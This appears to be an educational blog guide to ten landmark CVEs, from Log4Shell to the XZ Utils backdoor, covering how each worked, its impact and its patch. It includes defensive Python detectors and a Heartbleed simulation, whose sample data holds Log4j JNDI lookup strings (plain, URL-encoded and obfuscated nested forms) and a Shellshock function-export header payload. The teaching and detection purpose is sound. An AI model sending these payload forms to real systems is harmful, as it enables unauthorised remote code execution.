The best way to understand how to defend systems is to understand exactly how they were broken. Every major CVE in history is a masterclass in how attackers think, how software fails, and how a single overlooked vulnerability can cascade into a global crisis. Log4Shell brought down enterprise infrastructure worldwide. EternalBlue powered the WannaCry ransomware that paralysed hospitals. Heartbleed silently exposed private keys, passwords, and session tokens for two years before anyone noticed.
This guide walks through 10 of the most important CVEs ever disclosed — not just what they are, but how they worked at a technical level, the real-world damage they caused, how they were patched, and critically — what you as an ethical hacker or security professional must take away from each one. Whether you are preparing for a SOC Analyst interview, studying for OSCP, or hunting bugs on HackerOne, understanding these vulnerabilities will make you a better security professional.
At the end you will find a reference table of all 10.
- Log4Shell (CVE-2021-44228) — Apache Log4j RCE
- EternalBlue (CVE-2017-0144) — WannaCry / NotPetya
- Heartbleed (CVE-2014-0160) — OpenSSL memory leak
- Shellshock (CVE-2014-6271) — Bash RCE
- BlueKeep (CVE-2019-0708) — RDP wormable RCE
- PrintNightmare (CVE-2021-34527) — Windows Print Spooler
- Spring4Shell (CVE-2022-22965) — Spring Framework RCE
- Citrix Bleed (CVE-2023-4966) — Session token leak
- MOVEit Transfer (CVE-2023-34362) — SQL injection
- XZ Utils Backdoor (CVE-2024-3094) — Supply chain attack
- Summary reference table — all 10 CVEs
- Frequently asked questions
## 1. Log4Shell (CVE-2021-44228): Apache Log4j RCE

Log4j is a Java logging library used in an estimated 3 billion devices worldwide — from enterprise servers to cloud platforms to video games (including Minecraft). Log4Shell is a critical vulnerability in Log4j versions 2.0-beta9 through 2.14.1 that allows an attacker to execute arbitrary code on any server that logs attacker-controlled input.
The beauty — and horror — of Log4Shell is its simplicity. Log4j had a feature called JNDI (Java Naming and Directory Interface) lookup that allowed it to dynamically load content from external servers. An attacker only needed to get a target application to log a specific string.
The attacker sends a malicious string in any field the server logs — a username, HTTP header, User-Agent, search query, or even a Wi-Fi network name. When Log4j processes the string, it interprets the JNDI lookup instruction, reaches out to the attacker's server, downloads a malicious Java class file, and executes it on the target machine.
- Within 72 hours of disclosure, over 1.8 million exploitation attempts were observed globally
- Affected products included Apple iCloud, Amazon AWS, Microsoft Azure, Cloudflare, Tesla, Twitter, Minecraft, and thousands of enterprise Java applications
- Nation-state APT groups (Iran, North Korea, China, Turkey) were exploiting Log4Shell within hours of public disclosure
- The Belgian Defence Ministry confirmed a breach within days of the CVE going public
- The US CISA called it "one of the most serious vulnerabilities" ever seen and mandated federal agencies patch within days
Apache released Log4j 2.15.0 within days, disabling JNDI lookups by default. A second bypass was immediately found (CVE-2021-45046), requiring 2.16.0. The final fix was 2.17.0. The correct mitigation was updating to Log4j 2.17.1+ or setting log4j2.formatMsgNoLookups=true.
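The same lookup syntax the attack relies on is what detection keys on. The following added example (not from the original article or from the Log4j project) first collapses the nested-lookup obfuscation attackers used to hide the jndi keyword, then flags log lines that still contain a JNDI lookup; the access-log lines and the 203.0.113.5 host are constructed sample data.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one with no further ${ inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>:...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve_inner(match: re.Match) -> str:
    """Evaluate one innermost Log4j lookup closely enough to undo obfuscation
    such as ${lower:j}, ${::-j} or ${env:UNSET:-j} (assumed common forms)."""
    body = match.group(1)
    if body.strip().lower().startswith("jndi:"):
        return match.group(0)            # keep the JNDI lookup itself for the final check
    if ":-" in body:
        return body.rsplit(":-", 1)[1]   # default value of an undefined lookup
    prefix, sep, rest = body.partition(":")
    if sep and prefix.strip().lower() in ("lower", "upper"):
        return rest                      # case changes do not matter for matching
    return ""                            # sys:, env:, date: resolve to data we cannot know


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups from the inside out until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP.sub(_resolve_inner, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookups(lines):
    """Return (line_number, scheme, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        match = JNDI_LOOKUP.search(normalized)
        if match:
            hits.append((number, match.group(1).lower(), normalized))
    return hits


# Constructed web-server access-log lines (203.0.113.5 is a documentation address).
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.5%2Fx%7D HTTP/1.1" 404 "curl/7.88"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}${::-d}i:${::-l}dap://203.0.113.5/b}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "app version ${sys:java.version} ${date:yyyy}"',
]

if __name__ == "__main__":
    for number, scheme, normalized in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme} -> {normalized}")
```

Lines 2, 3 and 4 of the sample are reported (plain, URL-encoded and nested-lookup forms); the benign sys: and date: lookups on line 5 are not.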
## 2. EternalBlue (CVE-2017-0144): WannaCry / NotPetya

EternalBlue is a vulnerability in Microsoft's SMBv1 (Server Message Block) protocol — the file-sharing protocol used across Windows networks. Originally developed and weaponised by the NSA, it was stolen and leaked by the Shadow Brokers hacking group in April 2017. Microsoft had actually patched it one month earlier (MS17-010 in March 2017) — but millions of Windows machines remained unpatched.
EternalBlue exploits a buffer overflow in the SMBv1 SrvOs2FeaToNt function. By sending a specially crafted packet to port 445, an attacker can write shellcode into kernel memory and execute it with SYSTEM-level privileges — without any authentication, without any user interaction, and without any warning to the victim.
- WannaCry (May 2017) — ransomware using EternalBlue infected 200,000+ machines in 150 countries in 72 hours. UK NHS hospitals were forced to turn away patients. Estimated damage: $4–8 billion.
- NotPetya (June 2017) — a destructive wiper disguised as ransomware, also using EternalBlue. Caused $10 billion in damages globally. Maersk alone lost $300 million and had to reinstall 45,000 PCs and 4,000 servers from scratch.
- EternalBlue remains active in the wild in 2026 — millions of unpatched Windows 7 and Windows Server 2008 machines still exist, particularly in industrial and healthcare environments.
Microsoft released patch MS17-010 in March 2017 — before the leak. In May 2017, Microsoft took the unprecedented step of releasing patches for Windows XP, Vista, and Server 2003 — operating systems it had already ended support for — due to the severity of the outbreak.
## 3. Heartbleed (CVE-2014-0160): OpenSSL memory leak

Heartbleed is a memory disclosure vulnerability in OpenSSL — the cryptographic library used to implement SSL/TLS encryption for the majority of the internet. It existed silently for over two years (since December 2011) before being discovered in April 2014, meaning attackers potentially had undetected access to private keys, passwords, and session tokens across millions of HTTPS websites.
The bug is in the TLS Heartbeat extension — a mechanism that keeps SSL connections alive. The server was supposed to echo back whatever the client sent in a heartbeat request. But it never verified the claimed length of the message.
The attacker sends a heartbeat request claiming it contains 64KB of data, but actually only sends 1 byte. The vulnerable OpenSSL server echoes back 64KB of server memory — whatever happens to be in those memory addresses at that moment. This could include: private SSL/TLS keys, session tokens, usernames and passwords, encryption keys, and any other data the server has in memory.
- Estimated 17% of all HTTPS web servers were vulnerable at time of disclosure — approximately 500,000 websites
- Major services affected included Yahoo Mail, LastPass, OKCupid, Imgur, and many others
- Canada Revenue Agency had 900 Social Insurance Numbers stolen via Heartbleed and had to take systems offline
- Because the attack left no logs, it is impossible to know how long attackers had been silently exfiltrating data before disclosure
OpenSSL 1.0.1g patched the bug on the same day it was publicly disclosed. The fix: validate that the requested response length does not exceed the actual message length before reading from memory. After patching, all SSL certificates and session tokens had to be reissued because any previously issued cert could have been compromised.
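To make the missing bounds check concrete, here is an added example (not from the article and not OpenSSL's code) that simulates a heartbeat handler over a constructed memory buffer: the vulnerable handler trusts the length field and echoes whatever follows the record, while the patched handler applies the 1.0.1g check (header + claimed payload + padding must fit inside the received record) and discards the message. The session token and key material placed after the record are constructed placeholders.

```python
import struct
from typing import Optional, Tuple

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # RFC 6520: a HeartbeatMessage ends with at least 16 bytes of padding


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode type(1) | payload_length(2) | payload | padding. A caller may set a
    claimed_length that disagrees with the real payload to reproduce the bug."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HB_REQUEST, length) + payload + b"\x00" * PADDING


def heartbeat_vulnerable(memory: bytes, record_length: int) -> Optional[bytes]:
    """Pre-1.0.1g behaviour: read the length field and copy that many bytes
    starting at the payload, regardless of how long the record really is."""
    hbtype, length = struct.unpack("!BH", memory[:3])
    if hbtype != HB_REQUEST:
        return None
    payload = memory[3:3 + length]          # runs past the record into neighbouring memory
    return struct.pack("!BH", HB_RESPONSE, length) + payload + b"\x00" * PADDING


def heartbeat_patched(memory: bytes, record_length: int) -> Optional[bytes]:
    """1.0.1g behaviour: header, claimed payload and padding must all fit inside
    the received record, otherwise the message is silently discarded."""
    hbtype, length = struct.unpack("!BH", memory[:3])
    if hbtype != HB_REQUEST:
        return None
    if 1 + 2 + length + PADDING > record_length:
        return None
    payload = memory[3:3 + length]
    return struct.pack("!BH", HB_RESPONSE, length) + payload + b"\x00" * PADDING


def simulate(request: bytes) -> Tuple[Optional[bytes], Optional[bytes]]:
    """Place the request in a constructed memory buffer followed by the kind of data a
    real server has lying around, then run both handlers against it."""
    neighbouring = (b"session=9f2c7e1a-constructed-token;"
                    b"-----BEGIN RSA PRIVATE KEY-----constructed-----")
    memory = request + neighbouring
    return heartbeat_vulnerable(memory, len(request)), heartbeat_patched(memory, len(request))


if __name__ == "__main__":
    honest = build_heartbeat(b"ping")
    lying = build_heartbeat(b"p", claimed_length=64)     # claims 64 bytes, sends 1
    for name, req in (("honest", honest), ("lying", lying)):
        old, new = simulate(req)
        print(name, "| vulnerable ->", old, "| patched ->", new)
```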
## 4. Shellshock (CVE-2014-6271): Bash RCE

Shellshock is a vulnerability in the GNU Bash shell that had existed for approximately 25 years before being discovered in 2014. Bash allows environment variables to contain function definitions. The bug: Bash would execute any code appended after a function definition in an environment variable — code that should never have been run at all.
This became catastrophic because of CGI (Common Gateway Interface) web scripts — a mechanism where web servers pass HTTP headers and parameters to shell scripts as environment variables. An attacker could embed malicious code in HTTP headers like User-Agent or Referer and have the web server execute it.
- Within 24 hours of disclosure, botnets were actively scanning the entire internet for vulnerable CGI scripts
- Yahoo confirmed a breach via Shellshock — attackers gained access to servers via a vulnerable CGI script
- Shellshock also affected DHCP clients — a malicious DHCP server on the same network could exploit it to compromise Linux machines requesting IP addresses
- Akamai's networks were used to distribute Shellshock-based malware within days
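A quick way to check a host is the widely published Bash self-test, which only prints a marker if the installed shell still executes code trailing an exported function definition. The added example below (not from the article) wraps that check and also flags inbound header values of the "() {" shape that a CGI server would hand to a script as an environment variable; the sample request headers are constructed.

```python
import re
import shutil
import subprocess
from typing import Optional

# A Bash function exported through the environment starts with "() {". The
# pre-patch parser kept executing whatever followed the function body.
FUNCTION_EXPORT = re.compile(r"^\s*\(\)\s*\{")


def is_bash_vulnerable(bash: str = "bash") -> Optional[bool]:
    """Run the standard CVE-2014-6271 self-test: export a variable whose value is a
    harmless function definition followed by an echo. Returns True if the trailing
    echo ran, False if bash ignored it, None if bash cannot be run here."""
    path = shutil.which(bash)
    if path is None:
        return None
    env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo SHELLSHOCK_MARKER"}
    try:
        result = subprocess.run([path, "-c", "echo probe"], env=env,
                                capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return None
    return "SHELLSHOCK_MARKER" in result.stdout


def find_function_exports(headers: dict) -> list:
    """Return the names of HTTP headers whose value, once copied into a CGI script's
    environment, begins like an exported Bash function."""
    return [name for name, value in headers.items() if FUNCTION_EXPORT.match(value)]


# Constructed request headers for demonstration.
SAMPLE_HEADERS = {
    "Host": "intranet.example",
    "User-Agent": "() { :; }; echo constructed-probe",
    "Referer": "https://intranet.example/app",
    "Cookie": "theme=dark",
}

if __name__ == "__main__":
    print("bash vulnerable:", is_bash_vulnerable())
    print("suspicious headers:", find_function_exports(SAMPLE_HEADERS))
```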
## 5. BlueKeep (CVE-2019-0708): RDP wormable RCE

BlueKeep is a use-after-free vulnerability in Windows Remote Desktop Services (RDS) that allows an unauthenticated attacker to execute arbitrary code remotely on systems with RDP exposed on port 3389. Microsoft described it as "wormable" — meaning it could self-propagate across networks the same way WannaCry did — and compared it to EternalBlue in severity.
Affected systems: Windows 7, Windows Server 2003, 2008, and 2008 R2. Windows 8 and Windows 10 were not affected.
The vulnerability exists in the handling of Channel objects in RDP. By sending specially crafted pre-authentication RDP packets, an attacker can free a memory channel object and then trigger code execution in the freed memory region (use-after-free). No user interaction is needed and no authentication is required — connecting to port 3389 is enough.
- At time of disclosure, security researchers identified nearly 1 million internet-facing Windows systems vulnerable to BlueKeep
- A mass exploitation event occurred in November 2019 — attackers deployed cryptocurrency miners via BlueKeep on thousands of machines
- Unlike WannaCry, no large-scale worm emerged — but BlueKeep remains actively used in targeted attacks, particularly against internet-exposed RDP servers (a common vector for ransomware gangs)
- The NSA issued a rare public advisory urging immediate patching
## 6. PrintNightmare (CVE-2021-34527): Windows Print Spooler

PrintNightmare is a vulnerability in the Windows Print Spooler service that runs on all Windows machines by default. The vulnerability allows any authenticated user — even a low-privileged domain user — to install printer drivers that execute code with SYSTEM-level privileges. It can also be used for remote code execution across a network.
The CVE was made public before a patch existed when security researchers accidentally published a proof-of-concept on GitHub, believing Microsoft had already released a fix. It was removed within hours but had already been forked hundreds of times.
The Windows Print Spooler allows users to install printer drivers. The AddPrinterDriverEx function does not properly validate the privilege level of the calling user. An attacker with any valid domain credentials can call this function to load a malicious DLL that runs as SYSTEM — giving full control of the machine.
- Ransomware groups including Magniber, Vice Society, and Conti began using PrintNightmare within weeks of disclosure
- Particularly damaging in Active Directory environments — any domain user could escalate to Domain Admin if a Domain Controller had Print Spooler running (which many did by default)
- Microsoft's initial patch was incomplete and bypassed within 24 hours, requiring multiple re-patches over several weeks
## 7. Spring4Shell (CVE-2022-22965): Spring Framework RCE

Spring4Shell is a critical vulnerability in the Spring Framework — one of the most widely used Java application frameworks in the world, particularly in enterprise environments. The vulnerability allows an unauthenticated attacker to achieve remote code execution by manipulating class loader properties through HTTP request parameters.
The name "Spring4Shell" was coined due to its similarity to Log4Shell — both are Java-based, both are unauthenticated RCE, and both affect frameworks used in millions of enterprise applications. Media comparisons to Log4Shell created significant panic when it was disclosed.
Spring's data binding feature allows HTTP request parameters to be bound to Java object properties. By manipulating parameters that control the class.classLoader object, an attacker can write a malicious JSP web shell to the server's web root — which can then be accessed via the browser to execute arbitrary OS commands.
- Exploitation attempts began within hours of public proof-of-concept code being released
- Mirai botnet variants began incorporating Spring4Shell exploits within days
- Unlike Log4Shell, Spring4Shell had more specific requirements (Java 9+, Tomcat deployment, specific Spring configuration) which limited its overall impact — but targeted exploitation against enterprise Java applications was significant
## 8. Citrix Bleed (CVE-2023-4966): Session token leak

Citrix Bleed is a sensitive information disclosure vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances — widely used in enterprise networks for load balancing, VPN access, and application delivery. The vulnerability allows an unauthenticated attacker to retrieve valid session tokens from device memory, effectively bypassing authentication and MFA entirely.
The name "Citrix Bleed" was coined due to its similarity to Heartbleed — both leak sensitive data from memory without needing credentials.
By sending a specially crafted HTTP GET request to the NetScaler management interface, an attacker can trigger a buffer over-read that leaks up to 256 bytes of memory per request. This memory frequently contains valid authentication session tokens. With a stolen token, the attacker can log in as any user — including administrators — bypassing passwords and MFA entirely.
- LockBit ransomware group exploited Citrix Bleed to breach Boeing, China Industrial Bank (ICBC), Allen & Overy law firm, and DP World in late 2023
- ICBC's US operations were so severely disrupted that traders had to hand-deliver trade data on USB drives
- Mandiant reported that exploitation had been occurring since at least August 2023 — two months before Citrix disclosed it
- CISA issued an emergency directive mandating federal agencies patch within days
## 9. MOVEit Transfer (CVE-2023-34362): SQL injection

MOVEit Transfer is a managed file transfer (MFT) application used by thousands of enterprises and government agencies to transfer sensitive files securely. The vulnerability is an unauthenticated SQL injection in MOVEit's web application that allows attackers to read, modify, and delete data from the database — and ultimately execute OS commands on the underlying server.
The Cl0p ransomware group exploited this vulnerability in a mass exploitation campaign in May–June 2023, stealing data from over 2,700 organisations before a patch was even publicly available.
The vulnerability exists in the human.aspx endpoint in MOVEit's web application. By manipulating the X-siLock-Comment HTTP header with SQL injection payloads, an attacker can bypass authentication and query the database directly. Cl0p automated this to steal the sysadmin session token from the database and then upload a web shell called LEMURLOOT to the server.
- Over 2,700 organisations confirmed breached — the largest single vulnerability exploitation campaign of 2023
- Victims included US Department of Energy, Shell, British Airways, BBC, Boots pharmacy, Johns Hopkins University, Sony, PricewaterhouseCoopers, Ernst & Young, and many others
- Data from 93 million individuals was stolen and published on Cl0p's leak site
- Total estimated damages exceeded $9.9 billion according to Emsisoft's analysis
## 10. XZ Utils Backdoor (CVE-2024-3094): Supply chain attack

The XZ Utils backdoor is unlike any other CVE on this list. It was not a coding mistake — it was a deliberately planted backdoor, inserted by a sophisticated threat actor who spent nearly two years building trust as an open-source contributor before introducing malicious code into a widely-used Linux compression library.
XZ Utils is a data compression library used across virtually all Linux distributions. Because it is linked into systemd — and systemd is linked into sshd (the SSH daemon) on many modern Linux systems — a backdoor in XZ Utils effectively becomes a backdoor in SSH itself. The backdoor was designed to allow the attacker to authenticate to any affected system using a specific private key, bypassing all authentication.
The threat actor, operating under the alias "Jia Tan", began contributing to the XZ Utils project in 2021. Over two years they built a reputation for quality contributions. In 2024 they introduced malicious code into XZ Utils 5.6.0 and 5.6.1, hidden across multiple commits, disguised as test files and build scripts, and obfuscated using multiple layers of encoding.
- The backdoor was caught early — Fedora 41 beta and some rolling-release distros (Arch, Debian Testing) had distributed the vulnerable version, but it had not reached stable releases of major distributions
- The attacker's two-year patient campaign and sophisticated obfuscation techniques suggest a nation-state actor or well-resourced APT group
- If undetected and widely distributed, this would have been the most catastrophic Linux security incident in history — effectively a master key to SSH on every affected system
- The discovery has triggered an industry-wide rethink of open-source supply chain security and maintainer vetting processes
## Summary reference table

| # | CVE ID | Name | Type | CVSS | Year | Key impact |
|---|---|---|---|---|---|---|
| 1 | CVE-2021-44228 | Log4Shell | RCE | 10.0 | 2021 | 3 billion+ devices, global exploitation within hours |
| 2 | CVE-2017-0144 | EternalBlue | RCE / Wormable | 9.3 | 2017 | WannaCry ($4B damage), NotPetya ($10B damage) |
| 3 | CVE-2014-0160 | Heartbleed | Info Disclosure | 7.5 | 2014 | 500K+ HTTPS sites, private keys exposed silently for 2yrs |
| 4 | CVE-2014-6271 | Shellshock | RCE | 10.0 | 2014 | 25-year-old Bash bug, Yahoo breach, mass botnet exploitation |
| 5 | CVE-2019-0708 | BlueKeep | RCE / Wormable | 9.8 | 2019 | 1M+ vulnerable RDP servers, cryptomining campaigns |
| 6 | CVE-2021-34527 | PrintNightmare | LPE + RCE | 8.8 | 2021 | Low-priv user → SYSTEM, ransomware escalation |
| 7 | CVE-2022-22965 | Spring4Shell | RCE | 9.8 | 2022 | Spring Framework, Mirai botnet exploitation |
| 8 | CVE-2023-4966 | Citrix Bleed | Session Hijack | 9.4 | 2023 | LockBit breached Boeing, ICBC, MFA bypassed |
| 9 | CVE-2023-34362 | MOVEit SQLi | SQLi → RCE | 9.8 | 2023 | 2,700+ orgs breached, 93M records stolen by Cl0p |
| 10 | CVE-2024-3094 | XZ Backdoor | Supply Chain | 10.0 | 2024 | 2-year nation-state campaign targeting Linux SSH |
## ⚡ Put this knowledge to work

- Scan for these in your lab — set up Metasploitable 2 and run nmap --script vuln against it. You will find EternalBlue (MS17-010), vsftpd backdoor, and more — then use Metasploit to exploit each one.
- Learn the exploitation tools — every CVE here has a Metasploit module. Learn how to use them in an authorised lab environment.
- Start bug bounty hunting — MOVEit and Spring4Shell style vulnerabilities appear in enterprise web applications on bug bounty programs constantly.
- Follow CVEs as they drop — subscribe to CISA KEV (Known Exploited Vulnerabilities) catalogue, NVD (nvd.nist.gov), and Packet Storm Security for live CVE intelligence.
- Build your Kali toolkit — the commands used to detect and exploit these CVEs are all in your foundational toolkit.
## Frequently asked questions

### What is a CVE?

CVE stands for Common Vulnerabilities and Exposures. It is a standardised list of publicly disclosed cybersecurity vulnerabilities maintained by MITRE Corporation and sponsored by the US Department of Homeland Security. Each CVE entry gets a unique ID in the format CVE-YEAR-NUMBER (e.g., CVE-2021-44228 for Log4Shell). The CVSS (Common Vulnerability Scoring System) score from 0–10 indicates severity.

### Which CVE is considered the most dangerous in history?

Log4Shell (CVE-2021-44228) is widely considered the most dangerous CVE in history due to its combination of a perfect CVSS score of 10.0, unauthenticated remote code execution, and the fact that it affected an estimated 3 billion devices across nearly every major technology company and enterprise application. EternalBlue is a close second due to its role in WannaCry and NotPetya, which caused over $14 billion in combined damages.

### How do I check whether a system is vulnerable to a CVE?

The most common methods are: running Nmap with the relevant NSE vulnerability script (e.g., nmap --script smb-vuln-ms17-010 for EternalBlue), using Metasploit's auxiliary scanner modules, running a vulnerability scanner like OpenVAS or Tenable Nessus, or checking the installed software version against the vulnerable version range listed in the CVE database at nvd.nist.gov.

### What is the difference between a CVE and an exploit?

A CVE is simply the standardised identifier and description of a vulnerability — it describes the flaw but does not provide attack code. An exploit is the actual code or technique used to take advantage of the vulnerability. Many CVEs have publicly available proof-of-concept exploits on Exploit-DB or GitHub, and the most critical ones have Metasploit modules that make exploitation accessible without custom code development.

### Where can I follow new CVEs as they are disclosed?

The best sources are: the CISA Known Exploited Vulnerabilities (KEV) catalogue at cisa.gov/known-exploited-vulnerabilities-catalog (the most critical actively exploited CVEs), the National Vulnerability Database at nvd.nist.gov (all CVEs with CVSS scores), vendor security advisories (Microsoft Patch Tuesday, Apache Security Updates, etc.), and The Hacker News for news coverage of major vulnerabilities as they are disclosed.

### Are these CVEs still relevant today?

Yes — all 10 CVEs covered in this guide remain actively exploited in 2026. EternalBlue and BlueKeep still successfully compromise unpatched Windows 7 and Server 2008 machines found in industrial, healthcare, and small business environments. Log4Shell continues to be exploited because many organisations still have unpatched Java applications in their environment. Understanding historical CVEs is not just academic — these vulnerabilities are being used in real attacks against real organisations today.